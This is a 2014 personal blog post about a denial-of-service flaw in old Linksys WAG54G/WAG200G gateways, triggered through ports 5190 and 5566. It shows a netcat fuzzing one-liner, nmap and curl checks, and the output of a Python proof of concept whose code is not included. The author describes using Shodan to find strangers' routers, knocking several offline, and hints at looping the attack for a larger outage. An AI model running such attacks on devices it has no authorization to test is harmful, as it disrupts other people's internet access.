Saturday, September 6, 2014

Killing old Linksys WAG54* or WAG200* like "Rambo" (temporary)

Two days ago I visited a friend of mine. I was showing him how to discover open ports in a network with nmap. As an example I chose his home gateway. His gateway is/was a WAG54G from Linksys, with the firmware never updated. Year 2009, more or less.

He was surprised when we discovered two weird ports open on the gateway: 5190 and 5566. He didn't have any port configured to be open, but I ignored that because I thought they were some private ports used to configure the gateway from a GUI in Windows or something similar.

We were talking and connecting to some ports for a while... and I figured out that the behavior of port 5566 was different after connecting to port 5190. It was very odd.

If you connect to port 5566 you get disconnected immediately, but if you make a connection to port 5190 first, port 5566 waits for data in a lot of cases. Bye bye to the fast disconnection.

So, out of curiosity, I tried to fuzz the port with /dev/urandom... something similar to:
cat /dev/urandom | nc -v x.x.x.x 5566
Meanwhile... while I was explaining to my friend how a protocol works, our internet connection went down.

BOOM!        o_O

I said:  - Ermmm... Let me try it again buddy!      ..and...

BOOM!       O_O

I had to go back home. On the way, I was thinking about the port issue.

At home, my first step was to see if those ports were private or public... and BOOM! Public!

But I didn't have any Linksys router at home to try it again... so my friend Shodan came to the rescue! ;)

The next steps are very boring but, more or less, it was a huge trial and error process, and this was the PoC conclusion:

  • Very old Linksys: Shodan has a lot of them.
  • Ports 5190 and 5566 open: Shodan has few of them, but it has them.
  • Nmap to confirm some data.
There we go:
$ nmap -sS -p 5190,5566 x.x.x.x

Starting Nmap 5.51 ( ) at 2014-09-06 08:33 CEST
Nmap scan report for gateway (x.x.x.x)
Host is up (0.080s latency).
5190/tcp open  aol
5566/tcp open  westec-connect

Curl check:
$ curl -I -q --max-time 5 x.x.x.x
HTTP/1.1 401 Unauthorized
Date: Sat, 06 Sep 2014 06:31:53 GMT
WWW-Authenticate: Basic realm="Linksys WAG200G "
Content-Type: text/html
Connection: close

Ok. Ingredients OK. We can run the PoC. Sometimes you need to run it twice or more times. Honestly, I don't know why.

$ python x.x.x.x
OldLinksysMustDie v0.001b PoC
 * Connecting to x.x.x.x...
 * Cooking... be patient....
 * On Fire!
[BYEBYE] Ooops! connection to the target lost. [BYEBYE]

Curl again:

curl -I -q --max-time 5 x.x.x.x
curl: (28) Operation timed out after 5001 milliseconds with 0 bytes received

And RAMBO was here! I tried other ones and... all temporarily dead!!

NOTE: The router recovers 5-10 minutes after running the PoC, but, if you want a big DoS, a "loop" in the computer world is so easy..... ;)

Finally, my horrible PoC (horrible like my English) in Python:

Are you ready John?

Firmware affected: 
  • 1.01.04
